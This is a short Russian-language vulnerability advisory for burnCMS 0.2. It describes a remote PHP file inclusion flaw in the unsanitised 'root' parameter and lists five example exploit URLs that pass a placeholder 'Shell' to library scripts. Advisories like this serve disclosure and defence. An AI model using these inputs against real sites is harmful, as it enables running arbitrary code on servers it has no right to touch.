Программа: burnCMS 0.2
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных в параметре «root» разными сценариями. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера.
Пример:
[Path_burnCMS]/lib/authuser.php?root=Shell
[Path_burnCMS]/lib/misc.php?root=Shell
[Path_burnCMS]/lib/connect.php?root=Shell
[Path_burnCMS]/lib/db/mysql.class.php?root=Shell
[Path_burnCMS]/lib/db/postgres.class.php?root=Shell